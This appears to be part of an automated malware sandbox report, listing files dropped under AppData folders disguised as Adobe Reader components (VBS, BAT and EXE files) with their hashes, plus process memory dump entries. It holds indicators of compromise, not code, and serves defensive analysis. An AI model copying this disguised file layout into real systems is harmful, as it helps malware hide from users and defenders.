Filesize
556B

MD5
97410477dc9501dffca4ea4b1ae57273

SHA1
fb573b3bf4eba734b0f32db1a5b7ff78de36b064

SHA256
3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c

SHA512
3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs

Filesize
186B

MD5
09082253605a7171f078e26dc308a667

SHA1
585286c9fcda5e66e7fdb4e17a7bab6160183d46

SHA256
f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed

SHA512
adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs

Filesize
189B

MD5
ce8041824149d8266dbb0ad9688224d7

SHA1
3ab653c43ce66681ceaab90193e1a4c95d998090

SHA256
0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5

SHA512
e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe

Filesize
256KB

MD5
97b8dbcc7b3cc290aef4241df911ac2e

SHA1
733ababbcd278821d4e3ee78580841981f26642e

SHA256
c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023

SHA512
4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat

Filesize
139B

MD5
89412aba215b6cd18b8a64c4485fa03f

SHA1
37089346499f54a7d89262a67d95c8764ab3ca1f

SHA256
9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1

SHA512
7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe

Filesize
2.1MB

MD5
3351585db91521d6fa543490ac7cd6a5

SHA1
9be2b3abf17613d7386f9949cabaedd466902e82

SHA256
3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4

SHA512
804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe

Filesize
2.1MB

MD5
75a35514185cd2c5cf5aab50cc380963

SHA1
f1ff1e088f910398a48f4f7dfddec24e6d6d1734

SHA256
1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937

SHA512
ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297

Download Submit
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat

Filesize
1KB

MD5
ce7ccd3b48dbe8f34db3b2b1222e4fd9

SHA1
e25f9947c2b250c98dffd7bfeaca75b4db17dcfd

SHA256
6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e

SHA512
ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\011.011

Filesize
2KB

MD5
eadfdd96b9599f8a0c261068b42edba7

SHA1
603c45fbcece8f40718255642f669e62c108a2c0

SHA256
5732fa39833c77db4821ee764a234284ac73f235ba3cdf495779933ef5a4d46d

SHA512
835395ef84ba70b1e65191d11a862fd2b0759a572b14463fcd43ca59b3d09ffd624dd8a77725ad6a7f31a340abb54ae31d5131f54bb3dd8e07c3ea16286adcae

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\112.112

Filesize
400B

MD5
3c305699054489d4ba953729549294b8

SHA1
272b920622013b83dc073c26b75f5968663496c5

SHA256
52392e1693a81b409ab85297d0dc90dd360b0fd3ba022341499ab3f23add16d8

SHA512
7051b5a88aa709cf6496bddd82c91cc8d198390825c202ec34d1295e1070e62cf92566390dbd083b091a7c83d539d17751790e9cba569f4f566cd90de488000b

Download Submit
memory/2604-63-0x0000000002AC0000-0x0000000002CCC000-memory.dmp

Filesize
2.0MB

Download
memory/2604-73-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2604-72-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2604-74-0x0000000002AC0000-0x0000000002CCC000-memory.dmp

Filesize
2.0MB

Download
memory/2604-77-0x0000000002AC0000-0x0000000002CCC000-memory.dmp

Filesize
2.0MB

Download
memory/2604-85-0x0000000002AC0000-0x0000000002CCC000-memory.dmp

Filesize
2.0MB

Download
memory/2604-71-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2604-70-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2604-59-0x0000000002AC0000-0x0000000002CCC000-memory.dmp

Filesize
2.0MB

Download
memory/2604-57-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/2724-90-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/2724-120-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/4908-94-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/4908-100-0x00000000029C0000-0x0000000002BCC000-memory.dmp

Filesize
2.0MB

Download
memory/4908-110-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/4908-109-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/4908-111-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/4908-112-0x0000000000400000-0x00000000006B7000-memory.dmp

Filesize
2.7MB

Download
memory/4908-113-0x00000000029C0000-0x0000000002BCC000-memory.dmp

Filesize
2.0MB

Download
memory/4908-119-0x00000000029C0000-0x0000000002BCC000-memory.dmp

Filesize
2.0MB

Download
memory/4908-96-0x00000000029C0000-0x0000000002BCC000-memory.dmp

Filesize
2.0MB

Download
memory/4928-86-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download
memory/4928-53-0x0000000000400000-0x00000000006B4000-memory.dmp

Filesize
2.7MB

Download